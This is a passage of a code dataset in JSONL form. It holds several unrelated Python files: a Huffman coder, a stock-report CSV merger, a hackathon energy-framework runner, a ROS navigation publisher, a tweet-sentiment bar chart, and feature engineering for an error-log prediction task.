c1) = nodes[-1]\n (key2, c2) = nodes[-2]\n nodes = nodes[:-2]\n node = NodeTree(key1, key2)\n nodes.append((node, c1 + c2))\n\n nodes = sorted(nodes, key=lambda x: x[1], reverse=True)\n\n return nodes\n \n def printCode(self, inputs, huffmanCode):\n \n print(' Char | Huffman code ')\n print('----------------------')\n for (char, frequency) in self.fd:\n print(' %-4r |%12s' % (char, huffmanCode[char]))\n for c in inputs:\n print(huffmanCode[c])\n","sub_path":"huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"345096387","text":"import pandas as pd\r\nimport glob\r\nimport os\r\n\r\ndef twolist_to_list(lis):\r\n b = []\r\n for xs in lis:\r\n for x in xs:\r\n b.append(x)\r\n return b\r\ndef remove_save_file(p,path):\r\n if os.path.exists(path):\r\n os.remove(path)\r\n p.to_csv(path)\r\n else:\r\n p.to_csv(path)\r\n# Top10 = ['CPALL']\r\n# Top10 = ['ADVANC','DTAC','INTUCH','JAS','TRUE','CPALL','BBL','KBANK','KKP','KTB','SCB','TCAP','TISCO','TMB']\r\n# Top10 = ['ADVANC','DTAC','INTUCH','JAS','TRUE','CPALL','BBL','KBANK','KKP','KTB','SCB','TCAP','TISCO','TMB','BANPU','BCP','BCPG','BGRIM','BPP','CKP','EA','EGCO','ESSO','GPSC','GULF','GUNKUL','IRPC','PTG','PTT','PTTEP','RATCH','SGP','SPRC','SUPER','TOP','TPIPP','TTW','BCH','BDMS','BH','CHG']\r\nTop10 = ['BH','CPALL','INTUCH','KBANK','TOP']\r\n\r\n# Top10 = ['AOT','SCB','ADVANC','PTT','BDMS','CPALL']\r\nk=[]\r\nfor tag in Top10:\r\n print(tag)\r\n path = r'D:\\\\Program_code\\\\python\\\\Code_test\\\\stock_gap_NLP\\\\classification_report_combine' # use your path\r\n\r\n all_files = glob.glob(path +'\\\\'+ f'{tag}_*.csv') # method: normal\r\n # all_files = glob.glob(path +'\\\\'+ f'stopword_{tag}_*.csv')# method:stopword\r\n \r\n k.append(all_files)\r\n# path = r'D:\\\\Program_code\\\\python\\\\Code_test\\\\stock_gap_NLP\\\\classification_report_combine' # use your path\r\n# all_files = glob.glob(path +'\\\\'+ '*.csv')\r\n# print(k)\r\np=twolist_to_list(k)\r\nprint(p)\r\nprint(len(p))\r\nli = []\r\n\r\nfor filename in p:\r\n df = pd.read_csv(filename, index_col=None, header=0)\r\n li.append(df)\r\n# print(li)\r\nframe = pd.concat(li, axis=0, ignore_index=True)\r\nframe.drop(['Unnamed: 0'], inplace=True, axis=1)\r\nframe.drop_duplicates()\r\n# print(frame)\r\npath1=r'D:\\\\Master_Degree\\\\Project\\\\Classification_report\\\\Classification_method.csv'# method: normal\r\n# path1=r'D:\\\\Master_Degree\\\\Project\\\\Classification_report\\\\stopword_Classification_method.csv'# method:stopword\r\nremove_save_file(frame,path1)\r\n # print(df)\r\nos.remove(r'D:\\\\Master_Degree\\\\Project\\\\Classification_report\\\\Classification_method.csv')\r\nframe.to_csv(r'D:\\\\Master_Degree\\\\Project\\\\Classification_report\\\\Classification_method.csv')\r\n\r\n\r\n \r\n \r\n\r\n\r\n# frame.to_csv(r'D:\\\\Program_code\\\\python\\\\Code_test\\\\stock_gap_NLP\\\\combineall_2019-12-23.csv')","sub_path":"Stock_gap_NLP/code/combine_classification_report.py","file_name":"combine_classification_report.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"636733613","text":"\"\"\"This module represents Typhoon HIL framework that is used for\ntesting and rating of solutions.\n\n\"\"\"\nfrom multiprocessing import Process\n\nimport json\nfrom hackathon.utils.utils import *\nfrom hackathon.energy.rating import get_physics_metrics\n\nfrom hackathon.framework.http_server import run as http_server_run\nfrom hackathon.framework.http_server import prepare_dot_dir\nimport generate_profiles as gp\n\n__author__ = \"Novak Boskov\"\n__copyright__ = \"Typhoon HIL Inc.\"\n__license__ = \"MIT\"\n\n\ndef rater(socket: zmq.Socket, poller: zmq.Poller, data_msg: DataMessage) \\\n -> None:\n \"\"\"Calculate time spent by the solution in current cycle and physics\n mark for data_msg (if returned). Calculated data is being written\n in results file.\n\n \"\"\"\n start = time.time()\n # poller.poll blocks until message is sent or for passed\n # milliseconds if message is not sent\n msgs = dict(poller.poll(\n None if CFG.DBGPhysics else CFG.max_results_wait * 1000))\n spent = time.time() - start\n\n if socket in msgs and msgs[socket] == zmq.POLLIN:\n solution_response = socket.recv_pyobj().validate()\n\n match = True\n if solution_response.data_msg.id != data_msg.id:\n match = False\n spent = CFG.max_results_wait\n\n if CFG.DBG:\n print('DBG: {} {} received after {}s.'\n .format('ADEQUATE' if match else 'INADEQUATE',\n solution_response, spent))\n\n write_a_result(\n *get_physics_metrics(data_msg, solution_response, spent, match),\n data_msg)\n elif CFG.DBG:\n print('DBG: results are not sent in predefined interval of {}s.'\n .format(CFG.max_results_wait))\n\n\ndef run(args) -> None:\n prepare_dot_dir()\n gp.generate_profiles()\n config_outs(args, 'framework')\n\n data_emit_socket, _ = bind_pub_socket(CFG.in_address, CFG.in_port)\n result_gather_socket, _ = bind_sub_socket(CFG.out_address, CFG.out_port)\n results_poll = zmq.Poller()\n results_poll.register(result_gather_socket, zmq.POLLIN)\n\n # Run http server in separate process\n http = Process(target=http_server_run, args=())\n http.start()\n\n # Create results file, truncate if exists\n with open(CFG.results, 'w'):\n pass\n\n # Create results dump file, truncate if exists\n with open(CFG.results_dump, 'w'):\n pass\n\n # Open profile file\n with open(CFG.profile_file, 'r') as f:\n profile = json.load(f)\n\n print('Profile file from {} has loaded...'.format(CFG.profile_file))\n\n print('Loading physics initialization file')\n with open(CFG.physics_init, 'r') as f:\n ini = json.load(f)\n\n lapse_time = CFG.framework_lapse_time or 1\n print('Framework is booting with the lapse time of {}s ...'\n .format(lapse_time))\n time.sleep(lapse_time)\n\n for i, rec in enumerate(profile):\n if i == 0:\n soc_bess, overload, mg, current_power = ini['bessSOC'], \\\n ini['bessOverload'], \\\n ini['mainGridPower'], \\\n ini['bessPower']\n else:\n last = get_latest_result()\n soc_bess, overload, mg, current_power = last['bessSOC'], \\\n last['bessOverload'], \\\n last['mainGridPower'], \\\n last['bessPower']\n\n data = DataMessage(i,\n rec['gridStatus'], rec['buyingPrice'],\n rec['sellingPrice'], rec['currentLoad'],\n rec['solarProduction'],\n soc_bess, overload, mg, current_power)\n\n if CFG.DBG:\n print('Framework emits {}'.format(data))\n\n data_emit_socket.send_pyobj(data)\n rater(result_gather_socket, results_poll, data)\n\n # Send terminating message to the solution\n data_emit_socket.send_pyobj(False)\n\n # Write results json from dump\n with open(CFG.results, 'w') as f:\n json.dump(read_results(), f)\n\n if CFG.shutdown_http_server:\n # Gracefully terminate HTTP server process that serves results\n # to visualization web page\n time.sleep(2)\n http.terminate()\n print('Simple HTTP server has stopped.')\n else:\n print('Simple HTTP server is still running...')\n","sub_path":"hackathon/framework/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"602396723","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import PoseStamped, Quaternion\nfrom tf.transformations import quaternion_from_euler\n\nclass Navigation(object):\n def __init__(self):\n rospy.init_node('publish_nav_cmd')\n self.pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)\n\n def setGoal(self):\n ps = PoseStamped()\n ps.header.stamp = rospy.Time.now()\n ps.header.frame_id = \"map\"\n ps.pose.position.x = 10.0\n ps.pose.position.y = 10.0\n q = quaternion_from_euler(0.0 ,0.0 ,0.0)\n ps.pose.orientation = Quaternion(q[0], q[1], q[2], q[3])\n self.pub.publish(ps)\n\n\nif __name__ == '__main__':\n try:\n nav = Navigation()\n rate = rospy.Rate(100.0)\n while not rospy.is_shutdown():\n nav.setGoal()\n rate.sleep()\n except rospy.ROSInterruptException:\n rospy.loginfo(\"Error rospy\")\n finally:\n rospy.loginfo(\"Publish_nav_cmd stopped\")\n","sub_path":"src/publish_nav_cmd.py","file_name":"publish_nav_cmd.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"497267556","text":"\r\nfrom matplotlib import style\r\nimport matplotlib.animation as animation\r\n\r\nstyle.use(\"ggplot\")\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nwidth = 0.6\r\n\r\n\r\nfig, ax = plt.subplots()\r\n\r\n\r\ndef animate(i):\r\n \r\n data = open(\"twitter_output.txt\",\"r\").read()\r\n results = data.split('\\n')\r\n pos_occurence = results.count(\"pos\")\r\n neg_occurence = results.count(\"neg\")\r\n trash_occurence = results.count(\"trash\")\r\n total_tweets = len(results) \r\n \r\n rects1 = ax.bar(5, pos_occurence, width, color='g')\r\n\r\n rects3 = ax.bar(7, trash_occurence, width, color='#808080')\r\n rects2 = ax.bar(9, neg_occurence, width, color='r')\r\n\r\n \r\n\r\n ax.legend(['Positive: '+'%.2f' % ((pos_occurence/total_tweets)*100)+' %','Trashed: '+'%.2f' % ((trash_occurence/total_tweets)*100)+' %' , 'Negative: '+'%.2f' % ((neg_occurence/total_tweets)*100)+' %'],loc='center',fontsize='x-large' )\r\n ax.set_title('SCANNED TWEETS: '+str(total_tweets))\r\n \r\n#ind = np.arange(5,11,5) # the x locations for the groups\r\n # the width of the bars\r\n\r\nplt.ylabel('NO. OF TWEETS')\r\n\r\n\r\nani = animation.FuncAnimation(fig, animate, interval=1000)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# add some text for labels, title and axes ticks\r\n\r\n\r\n#ax.set_xticks(ind + width/2)\r\n#ax.set_xticklabels(('Positive','Negative'))\r\n#plt.xticks( (6,11), ('Positive','Negative') )\r\n\r\n\r\n\r\n\r\n\r\n#autolabel(rects2)\r\n\r\nplt.show()\r\n\r\n\r\n","sub_path":"plot_bar.py","file_name":"plot_bar.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"490368489","text":"import pandas as pd\nimport numpy as np\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport pickle\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nfrom tqdm import tqdm\nimport gc\nimport random\nimport lightgbm as lgb\nimport re\nfrom sklearn.metrics import *\nfrom sklearn.model_selection import KFold\nimport warnings\nfrom collections import Counter, defaultdict\nwarnings.filterwarnings(action='ignore')\n\nfrom gensim.models import KeyedVectors\n\nfrom scipy.stats import skew\nfrom scipy.stats import norm, kurtosis\n\ndef make_datetime_day(x):\n # string 타입의 Time column을 datetime 타입으로 변경\n x = str(x)\n # print(x)\n year = int(x[:4])\n month = int(x[4:6])\n day = int(x[6:8])\n hour = int(x[8:10])\n #min = int(x[10:12])\n #sec = int(x[12:])\n return dt.datetime(year, month, day, hour)\n\ndef dataset_trans2(df, types, Num_df_user, Num_errtype, First_index, fwver_total):\n num_df_user = Num_df_user\n num_errtype =Num_errtype\n first_index = First_index\n \n df2 = df.copy()\n \n df2['time_second'] = df2['time'].apply(make_datetime_second)\n \n \n \n df2['hour'] =df2.time_second.dt.hour\n\n\n df2 = df2.loc[(df2.time_second >=pd.to_datetime('2020-11-01 00:00:00')) & (df2.time_second <=pd.to_datetime('2020-11-30 23:59:59'))]\n #datas = df[['user_id','errtype','hour']]\n #df_=datas[['user_id','hour','errtype']].count().to_frame().reset_index()\n df_=df2.groupby(['user_id','hour','errtype']).count().reset_index()\n #df_ =df_.sort_values(['user_id','hour']).rename(columns = {0:'counts'}).reset_index(drop=True)\n\n\n day_data = np.zeros((num_df_user,42,24))\n for i in range(24):\n # time 변수가 결국 count 수.\n dfa = df_.loc[df_['hour']==i][['user_id','errtype','time']].values\n for inx , val1 ,val2 in tqdm(dfa):\n day_data[:,:,i][inx-first_index,val1-1] = val2\n\n m2=day_data.mean(axis=2)\n std2=day_data.std(axis=2) \n m2_max = day_data.max(axis=2)\n #m2_1=day_data.max(axis=2)\n \n df2['day'] =df2.time_second.dt.day\n\n\n df2 = df2.loc[(df2.time_second >=pd.to_datetime('2020-11-01 00:00:00')) & (df2.time_second <=pd.to_datetime('2020-11-30 23:59:59'))]\n #datas = df[['user_id','errtype','day']]\n #df_=datas[['user_id','day','errtype']].count().to_frame().reset_index()\n df_=df2.groupby(['user_id','day','errtype']).count().reset_index()\n #df_ =df_.sort_values(['user_id','day']).rename(columns = {0:'counts'}).reset_index(drop=True)\n\n\n day_data = np.zeros((num_df_user,42,30))\n for i in range(30):\n dfa = df_.loc[df_['day']==(i+1)][['user_id','errtype','time']].values\n for inx , val1 ,val2 in tqdm(dfa):\n day_data[:,:,i][inx-first_index,val1-1] = val2\n\n m3=day_data.mean(axis=2)\n std3=day_data.std(axis=2) \n m3_max = day_data.max(axis=2)\n #m3_1=day_data.max(axis=2)\n \n return [m2, std2,m2_max, m3, std3,m3_max]\n\n\n\ndef f_pr_auc(probas_pred, y_true):\n labels=y_true.get_label()\n p, r, _ = precision_recall_curve(labels, probas_pred)\n score=auc(r,p) \n return \"pr_auc\", score, True\n\n\ndef mk_err_feature(df,user_num,user_min,complainer_48h_errcode_unique_testtrain,no_complainer_48h_errcode_unique_testtrain):\n model = KeyedVectors.load_word2vec_format('errtype_w2v')\n df['typecode'] = df.errtype.astype(str) + df.errcode.astype(str)\n id_err_var = df[['user_id','typecode','errtype','fwver','errcode','model_nm']].values\n\n # 빈 array 생성\n typecode_arr = np.zeros((user_num,3))\n type_arr = np.zeros((user_num,47))\n fwver_arr = np.zeros((user_num,14))\n code_arr = np.zeros((user_num, 17))\n type_w2v_arr = np.zeros((user_num, 32))\n\n for idx, typecode,type, fwver, code, model in tqdm(id_err_var):\n\n # type + code\n if typecode in ['101','23connection fail to establish']:\n typecode_arr[idx - user_min,0] += 1\n elif typecode in ['40','332','261','141','151','161','111','121']:\n typecode_arr[idx - user_min,1] += 1\n\n typecode_arr[idx - user_min,2] = (typecode_arr[idx - user_min,0])/(typecode_arr[idx - user_min,1]+1)\n \n # errtype\n type_arr[idx - user_min,type - 1] += 1\n\n if type in [25,18,20,19,21]:\n type_arr[idx - user_min,42] += 1\n elif type in [34,10,35,13,30,27,28]:\n type_arr[idx - user_min,43] += 1\n elif type in [2,4,42,26]:\n type_arr[idx - user_min,44] += 1\n elif type in [1,8]:\n type_arr[idx - user_min,45] += 1\n type_arr[idx - user_min,46] = (type_arr[idx - user_min,42])/(type_arr[idx - user_min,45]+1) \n\n # lst = []\n # for type in id_err_var[id_err_var.user_id==idx].errtype:\n # lst.append(model.wv.get_vector(str(type)))\n\n # type_w2v_arr[idx-user_min] = np.array(lst).mean(axis=0)\n\n # fwver\n fwver_dict = {'05.15.2138':0,'04.22.1750':1,'04.33.1261':2,'04.16.3553':3,'03.11.1167':4,'04.22.1778':5,'04.22.1684':6,'04.33.1185':7,'04.16.3571':8}\n try:\n fwver_arr[idx-user_min,fwver_dict[fwver]] += 1\n except:\n fwver_arr[idx-user_min,9] += 1\n\n if fwver in ['04.33.1149','04.73.2571','04.16.3571']:\n fwver_arr[idx-user_min,10] += 1\n elif fwver in ['05.15.2120','10']:\n fwver_arr[idx-user_min,11] += 1\n elif fwver in ['04.73.2237','04.22.1684','05.15.2138']:\n fwver_arr[idx-user_min,12] += 1\n fwver_arr[idx - user_min,13] = (fwver_arr[idx-user_min,10])/(fwver_arr[idx-user_min,12]+1)\n\n # errcode\n errcode_top14 = ['1', '0', 'connection timeout', 'B-A8002', '80', '79', '14', 'active','2', '84', '85', 'standby', 'NFANDROID2','connection fail to establish']\n if code in errcode_top14:\n code_arr[idx-user_min,errcode_top14.index(code)] += 1\n elif code in list(complainer_48h_errcode_unique_testtrain)+['5','6','V-21008','terminate by peer user']:\n code_arr[idx-user_min,14] += 1\n # elif code in ['H-51042','connection fail to establish','4','14','13','83','3','connection timeout']:\n # code_arr[idx-user_min,15] += 1\n elif code in list(no_complainer_48h_errcode_unique_testtrain)+['Q-64002','S-65002','0']:\n code_arr[idx-user_min,15] += 1\n code_arr[idx-user_min,16] = (code_arr[idx-user_min,14])/(code_arr[idx-user_min,15]+1)\n\n\n # 변수 평균 분산 추가\n type_mean = type_arr[:,42:].mean(axis=1)\n type_std = type_arr[:,42:].std(axis=1)\n\n typecode_mean = typecode_arr.mean(axis=1)\n typecode_std = typecode_arr.std(axis=1)\n\n fwver_arr_mean = fwver_arr[:,9:].mean(axis=1)\n fwver_arr_std = fwver_arr[:,9:].std(axis=1)\n\n code_mean = code_arr[:,:14].mean(axis=1)\n code_std = code_arr[:,:14].std(axis=1)\n\n mean_var = np.concatenate((type_mean.reshape(-1,1),type_std.reshape(-1,1),typecode_mean.reshape(-1,1),typecode_std.reshape(-1,1),fwver_arr_mean.reshape(-1,1),fwver_arr_std.reshape(-1,1),code_mean.reshape(-1,1),code_std.reshape(-1,1)),axis=1)\n\n return np.concatenate((typecode_arr,type_arr,fwver_arr,code_arr),axis=1)\n\n\ndef mk_qt_feature(df,vars,user_num,user_min):\n\n for qual_num in list(map(lambda x: 'quality_'+ x, [str(i) for i in range(13)])):\n df[qual_num] = df[qual_num].apply(lambda x: float(x.replace(\",\",\"\")) if type(x) == str else x)\n\n q1 = np.zeros((user_num,6))\n q2 = np.zeros((user_num,6))\n q3 = np.zeros((user_num,1))\n qt_cnt = df.groupby('user_id').count()['time']/12\n dict = {key:value for key,value in zip(qt_cnt.index,qt_cnt.values)}\n for i in range(user_num):\n if i+user_min in dict.keys():\n q3[i,0] = dict[i+user_min]\n\n # 0,1,2,6,8,11,12 거의 비슷, 5,7,9,10 거의 비슷, 각각 평균 내서 사용\n for i, var in enumerate(vars):\n id_q = df[['user_id',var]].values\n res = np.zeros((user_num,6))\n\n for idx, num in tqdm(id_q):\n if num == 0:\n res[int(idx)-user_min,0] += 1\n elif num == -1:\n res[int(idx)-user_min,1] += 1\n elif num == 1:\n res[int(idx)-user_min,2] += 1\n elif num == 2:\n res[int(idx)-user_min,3] += 1\n elif num == 3:\n res[int(idx)-user_min,4] += 1\n else:\n res[int(idx)-user_min,5] += 1\n q1 += res\n\n qt_mean = q1.mean(axis=1)\n qt_var = q1.std(axis=1)\n\n # q1 = q1/q1.sum(axis=1).shape(-1,1)\n \n return np.concatenate((q1/11,q3,qt_mean.reshape(-1,1),qt_var.reshape(-1,1)),axis=1)\n\n\n\ndef make_datetime(x):\n # string 타입의 Time column을 datetime 타입으로 변경\n x = str(x)\n # print(x)\n year = int(x[:4])\n month = int(x[4:6])\n day = int(x[6:8])\n hour = int(x[8:10])\n # min = int(x[10:12])\n # sec = int(x[12:])\n return dt.datetime(year, month, day, hour)\n\n\n\ndef mk_time_feature(df, user_num, user_min,err_mode=True):\n # hour 구간 count 4개 비율 4개 총 8개\n # day 구간 count 4개 비율 4개 총 8개\n # err은 일자별 error statics 6개\n # qual: 16개/err : 22개\n df['time'] = df['time'].map(lambda x: make_datetime(x))\n\n # df[\"hour\"] = df[\"time\"].dt.hour\n df[\"dayofweek\"] = df[\"time\"].dt.dayofweek\n\n # # hour\n # hour_error = df[['user_id', 'hour']].values\n # hour = np.zeros((user_num, 24))\n #\n # for person_idx, hr in tqdm(hour_error):\n # hour[person_idx - user_min, hr - 1] += 1\n\n df[\"hour\"] = df[\"time\"].dt.hour\n conditionlist = [\n (df['hour'] >= 11) & (df['hour'] < 14),\n (df['hour'] >= 14) & (df['hour'] < 20),\n (df['hour'] >= 20) & (df['hour'] < 24) | (df['hour'] == 0)]\n\n choicelist = [0, 1, 2] # lunch :0, Afternoon:1 , Night : 2, others : 3\n df['hour_segment'] = np.select(conditionlist, choicelist, default=3)\n\n df_time_err = pd.concat([df['user_id'], df['hour_segment']], axis=1).values\n\n hour_err = np.zeros((user_num, 8))\n\n print('hour_Err shape', hour_err.shape)\n print('train_time_err shape', df_time_err.shape)\n\n for person_idx, hr in tqdm(df_time_err):\n hour_err[person_idx - user_min, hr - 1] += 1\n\n hour_err_sum = np.sum(hour_err, axis=1)\n\n for num in range(4):\n hour_err[:, num + 4] = hour_err[:, num] / hour_err_sum\n \n df_hour = pd.DataFrame(hour_err)\n df_hour = df_hour.fillna(0)\n\n hour_err = df_hour.values\n\n # day\n day_error = df[['user_id', 'dayofweek']].values\n day = np.zeros((user_num, 4))\n\n for person_idx, d in tqdm(day_error):\n if d == 1:\n day[person_idx - user_min, 0] += 1\n if d == 5:\n day[person_idx - user_min, 1] += 1\n if d == 6:\n day[person_idx - user_min, 2] += 1\n else:\n day[person_idx - user_min, 3] += 1\n\n df_day = pd.DataFrame(day, columns=['Mon', 'Sat', 'Sun', 'others'])\n df_day['all'] = df_day['Mon'] + df_day['Sat'] + df_day['Sun'] + df_day['others']\n\n for var in ['Mon', 'Sat', 'Sun', 'others']:\n df_day[var + '_pct'] = df_day[var] / df_day['all']\n\n del df_day['all']\n df_day = df_day.fillna(0)\n\n df_day_val = df_day.values\n if err_mode :\n err_date = df.groupby([df['user_id'],df['time'].dt.date]).size().reset_index(name='counts')\n err_time_stat = err_date.groupby('user_id').agg({'counts': [np.min, np.max, np.mean, np.std, skew,np.size]}).reset_index()\n err_time_stat.columns = ['user_id', 'time_min', 'time_max', 'time_mean', 'time_std', 'time_skew','time_count']\n err_time_stat.time_std = err_time_stat.time_std.fillna(0)\n if user_min>10000:\n err_time_stat.loc[-1] = [43262, 0, 0, 0,0,0,0] # adding a row\n err_time_stat.index = err_time_stat.index + 1 # shifting index\n err_time_stat = err_time_stat.sort_values(by='user_id') # sorting by index\n err_time_stat.drop('user_id', axis=1, inplace=True)\n err_time_val = err_time_stat.values\n\n return np.concatenate((hour_err, df_day_val,err_time_val), axis=1)\n else:\n return np.concatenate((hour_err, df_day_val), axis=1)\n\n\n\n## fwver_count\ndef mk_fwver_feature(df,user_num,user_min):\n df = df.groupby(['user_id', 'model_nm'])\n user_id_fwver_count = df['fwver'].describe()\n fwver_array = np.array(user_id_fwver_count.unique)\n fwver_count = np.zeros((user_num, 1))\n \n id = 0\n for user_id, model_nm in tqdm(user_id_fwver_count.index):\n fwver_count[user_id-user_min,0] += fwver_array[id]\n id +=1\n \n return fwver_count\n\n\n\n\n\n\ndef make_date(x):\n # string 타입의 Time column을 datetime 타입으로 변경\n x = str(x)\n year = int(x[:4])\n month = int(x[4:6])\n day = int(x[6:8])\n return dt.datetime(year, month, day)\n\n\n\ndef fill_quality_missing(df_err, df_quality):\n # df_err['time_day'] = df_err['time'].map(lambda x : make_date(x))\n # df_quality['time_day'] = df_err['time'].map(lambda x : make_date(x))\n\n # #fwver 채우기\n # for i in len(df_quality[df_quality['fwver'].isna()]):\n # df_quality[df_quality['fwver'].isna()][i]['fwver'] = df_err[(df_err['user_id'] == df_quality[df_quality['fwver'].isna()][i]['user_id']) & (df_err['time_day'] ==df_quality[df_quality['fwver'].isna()][i]['time_day'])]['fwver'][0]\n\n\n #quality_n 채우기\n qual_list = ['quality_0', 'quality_1', 'quality_2', 'quality_5', 'quality_6', 'quality_7', 'quality_8', 'quality_9', 'quality_11', 'quality_12']\n for i in qual_list:\n df_quality[i].fillna(0)\n\n df_quality['qulity_10'].fillna(3)\n \n return df_quality\n\n\ndef err_count(df,user_num, df_cat):\n if df_cat == 'train':\n n_total_train = df.groupby('user_id')['user_id'].count()\n #print(n_total_train.shape)\n output= np.array(n_total_train).reshape(user_num,1)\n else:\n n_total_test = df.groupby('user_id')['user_id'].count()\n total_test_list = n_total_test.tolist()\n total_test_list.insert(13262,0)\n output= np.array(total_test_list).reshape(user_num,1)\n #test_x3.shape\n \n return output\n\n\ndef qua_count(df,user_num, user_min,qt_id, noqt_id):\n qua_count = df.groupby('user_id')['user_id'].count()/12\n qua_count_mean = qua_count.mean()\n qua_count_list = [0 for i in range(user_num)]\n \n id=0\n for i in qt_id:\n i = i-user_min\n qua_count_list[i] = qua_count.iloc[id]\n id+=1\n for i in noqt_id:\n i = i-user_min\n qua_count_list[i] = qua_count_mean\n return np.array(qua_count_list).reshape(user_num,1)\n\n\ndef tfidf(train=True):\n if train:\n with open(\"train_errtype_Text.pickle\",\"rb\") as fr:\n lst = pickle.load(fr)\n else:\n with open(\"test_errtype_Text.pickle\",\"rb\") as fr:\n lst = pickle.load(fr)\n\n tfidf_vectorizer = TfidfVectorizer()\n X = tfidf_vectorizer.fit_transform(lst)\n\n return X.toarray()\n\n\ndef make_datetime_second(x):\n # string 타입의 Time column을 datetime 타입으로 변경\n x = str(x)\n # print(x)\n year = int(x[:4])\n month = int(x[4:6])\n day = int(x[6:8])\n hour = int(x[8:10])\n min = int(x[10:12])\n sec = int(x[12:])\n return dt.datetime(year, month, day, hour, min, sec)\n\n\n\ndef dataset_trans(df, types, Num_df_user, Num_errtype, First_index, fwver_total):\n num_df_user = Num_df_user\n num_errtype =Num_errtype\n first_index = First_index\n \n \n fwver_total_dic ={}\n for v in range(len(fwver_total)):\n fwver_total_dic[sorted(list(fwver_total))[v]] = v+1\n\n def fwver_tran(x):\n return fwver_total_dic[x]\n\n\n df['ver_num'] = df['fwver'].apply(fwver_tran)\n #\n fwver_np = np.zeros((num_df_user,5))\n\n v3=df[['user_id','ver_num']]\n getdf =~(v3 == v3.shift(1))\n logical =(getdf.user_id.apply(int) + getdf.ver_num.apply(int)) > 0\n fwver_num=v3[logical]\n\n fwver_num = fwver_num.reset_index(drop=True)\n count =np.zeros(len(fwver_num),dtype=int)\n\n for v in range(1,len(fwver_num)):\n if fwver_num.user_id.values[v-1] ==fwver_num.user_id.values[v]:\n count[v] = count[v-1] +1\n\n\n fwver_num['count'] =count\n fw_v = fwver_num.loc[fwver_num['count'].isin([0,1,2,3,4])].pivot(index='user_id',columns='count').reset_index().fillna(0).values\n fw_v =fw_v.astype('int64')\n\n \n for inx, v1,v2,v3,v4,v5 in tqdm(fw_v):\n fwver_np[inx-first_index,0] =v1\n fwver_np[inx-first_index,1] =v2\n fwver_np[inx-first_index,2] =v3\n fwver_np[inx-first_index,3] =v4\n fwver_np[inx-first_index,4] =v5\n #print(fwver_np.shape)\n #print(model_n.shape)\n \n target_df = df\n first_num = first_index\n count_num =num_df_user\n\n dp = target_df[['user_id','model_nm','fwver']]\n unique_data =target_df[(dp !=dp.shift(1)).sum(axis=1)>0]\n\n dp2 = target_df[['user_id','model_nm']]\n unique_data2 =target_df[(dp2 !=dp2.shift(1)).sum(axis=1)>0]\n\n fwver_total_dic ={}\n for v in range(len(fwver_total)):\n fwver_total_dic[sorted(list(fwver_total))[v]] = v+1\n \n def fwver_tran(x):\n return fwver_total_dic[x]\n\n fwver = np.zeros((count_num,24))\n for idx in tqdm(unique_data.user_id.unique()):\n df_md =unique_data2.loc[unique_data2.user_id==idx].model_nm.values\n df_fw = unique_data.loc[unique_data.user_id==idx].fwver.values\n\n for md in range(len(df_md)):\n fwver[idx-first_num,md] = int(df_md[md][-1])+1\n\n for l in range(3,len(df_fw)+3):\n fwver[idx-first_num,l] =fwver_total_dic[df_fw[l-3]]\n\n fw_df = pd.DataFrame(fwver).reset_index().rename(columns={'index':'user_id'})\n\n fwver_total_dic_rev = {v: k for k, v in fwver_total_dic.items()}\n fwver_total_dic_rev2 = fwver_total_dic_rev.copy()\n fwver_total_dic_rev[0] =0\n fwver_total_dic_rev2[0] = '04.22.1750' #max 값\n\n\n def fwver_tras_reverse(x):\n return fwver_total_dic_rev[x]\n\n def fwver_tras_reverse2(x):\n return fwver_total_dic_rev2[x]\n\n fw_df[3] =fw_df[3].apply(fwver_tras_reverse2)\n fw_df[4] =fw_df[4].apply(fwver_tras_reverse)\n fw_df[5] =fw_df[5].apply(fwver_tras_reverse)\n fw_df[6] =fw_df[6].apply(fwver_tras_reverse)\n fw_df[7] =fw_df[7].apply(fwver_tras_reverse)\n\n\n fw_df = fw_df.rename(columns={0:'md1',1:'md2',2:'md3',3:'fw1',4:'fw2',5:'fw3',6:'fw4',7:'fw5'})\n fw_df['user_id'] =fw_df['user_id']+10000\n\n pre_df=fw_df.iloc[:,:9]\n\n md_flow = {str(x.astype(\"int\")):(i+1) for i,x in enumerate(pre_df[['md1','md2','md3']].drop_duplicates().reset_index(drop=True).values)}\n fw_flow = {str(x):(i+1) for i,x in enumerate(pre_df[['fw1','fw2','fw3','fw4','fw5']].drop_duplicates().reset_index(drop=True).values)}\n\n \n def fw_change_counter(x):\n fwlst = []\n for v in ['fw1','fw2','fw3','fw4','fw5']:\n if x[v] ==0:\n pass\n else:\n fwlst +=[x[v]]\n\n if len(fwlst) ==len(list(set(fwlst))):\n return 0\n else:\n return 1\n\n\n def md_flow_change(x):\n return md_flow[str(x[['md1','md2','md3']].values.astype(\"int\"))]\n\n def fw_flow_change(x):\n return fw_flow[str(x[['fw1','fw2','fw3','fw4','fw5']].values)]\n \n def mean_str_fw_dum(x):\n fwlst = []\n for v in ['fw1','fw2','fw3','fw4','fw5']:\n if x[v] ==0:\n pass\n else:\n fwlst +=[int(x[v].replace('.',\"\"))]\n return np.array(fwlst).mean()\n\n\n\n def std_str_fw_dum(x):\n fwlst = []\n for v in ['fw1','fw2','fw3','fw4','fw5']:\n if x[v] ==0:\n pass\n else:\n fwlst +=[int(x[v].replace('.',\"\"))]\n return np.array(fwlst).std()\n\n pre_df=fw_df.iloc[:,:9]\n #pre_df['md_counts'] = pre_df[['md1','md2','md3']].astype('bool').sum(axis=1)\n #pre_df['fw_counts'] = 